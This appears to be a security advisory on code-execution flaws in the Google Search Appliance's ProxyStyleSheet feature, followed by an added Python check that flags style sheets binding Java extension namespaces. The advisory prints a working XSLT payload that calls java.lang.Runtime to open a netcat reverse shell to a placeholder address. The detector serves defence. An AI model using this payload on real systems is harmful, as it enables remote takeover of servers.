Google Search Appliance ProxyStyleSheet Multiple Remote Vulnerabilities
An exploit is not required to leverage these issues. An example style sheet sufficient to execute commands has been provided:

    <xsl:template name="my_page_footer"
      xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
      xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime" >
    <!-- Google Mini XSLT Code Execution [metasploit] -->
    XSLT Version: <xsl:value-of select="system-property('xsl:version')"/> <br />
    XSLT Vendor: <xsl:value-of select="system-property('xsl:vendor')" /> <br />
    XSLT URL: <xsl:value-of select="system-property('xsl:vendor-url')" /> <br />
    OS: <xsl:value-of select="sys:getProperty('os.name')" /> <br />
    Version: <xsl:value-of select="sys:getProperty('os.version')" /> <br />
    Arch: <xsl:value-of select="sys:getProperty('os.arch')" /> <br />
    UserName: <xsl:value-of select="sys:getProperty('user.name')" /> <br />
    UserHome: <xsl:value-of select="sys:getProperty('user.home')" /> <br />
    UserDir: <xsl:value-of select="sys:getProperty('user.dir')" /> <br />
    Executing command...<br />
    <xsl:value-of select="run:exec(run:getRuntime(), 'sh -c nc${IFS}255.255.255.255${IFS}53|sh|nc${IFS}255.255.255.255${IFS}53')" />
    </span>
    </xsl:template>

An exploit for the Metasploit Framework is also available:
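For defenders, the style sheet above is recognizable by its namespace declarations, which bind prefixes to Java classes. The following check is an added example, not part of the original advisory or of any vendor code: it flags any style sheet that declares such a binding before it is handed to an XSLT processor. The function names, the sample documents and the Xalan URI prefixes are assumptions introduced here.

```python
import io
import xml.etree.ElementTree as ET

# Namespace URI prefixes that XSLT processors map onto Java classes.
# The first comes from the style sheet in this advisory; the Xalan forms
# are an assumption added here to cover another common processor.
JAVA_EXTENSION_PREFIXES = (
    "http://www.oracle.com/XSL/Transform/java/",
    "http://xml.apache.org/xalan/java",
    "http://xml.apache.org/xslt/java",
    "xalan://",
)

def java_extension_bindings(stylesheet: bytes):
    """Return [(prefix, java_class_or_uri)] for each Java extension namespace declared."""
    found = []
    # "start-ns" events report every xmlns declaration, on any element.
    for _event, (prefix, uri) in ET.iterparse(io.BytesIO(stylesheet), events=("start-ns",)):
        for marker in JAVA_EXTENSION_PREFIXES:
            if uri.startswith(marker):
                found.append((prefix, uri[len(marker):].lstrip("/") or uri))
                break
    return found

def is_acceptable(stylesheet: bytes) -> bool:
    """Reject style sheets that are malformed or that bind a Java extension namespace."""
    try:
        return not java_extension_bindings(stylesheet)
    except ET.ParseError:
        return False  # fail closed on anything that does not parse

# Constructed samples: SUSPECT mirrors the namespace bindings shown in the
# advisory but only reads a system property; BENIGN has no Java binding.
SUSPECT = b"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template name="my_page_footer"
  xmlns:sys="http://www.oracle.com/XSL/Transform/java/java.lang.System"
  xmlns:run="http://www.oracle.com/XSL/Transform/java/java.lang.Runtime">
OS: <xsl:value-of select="sys:getProperty('os.name')"/>
</xsl:template>
</xsl:stylesheet>"""

BENIGN = b"""<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template name="my_page_footer"><span>footer</span></xsl:template>
</xsl:stylesheet>"""

if __name__ == "__main__":
    print(java_extension_bindings(SUSPECT), is_acceptable(SUSPECT), is_acceptable(BENIGN))
```

A namespace pre-filter like this is a detection aid; it complements, and does not replace, disabling extension functions in the XSLT processor itself.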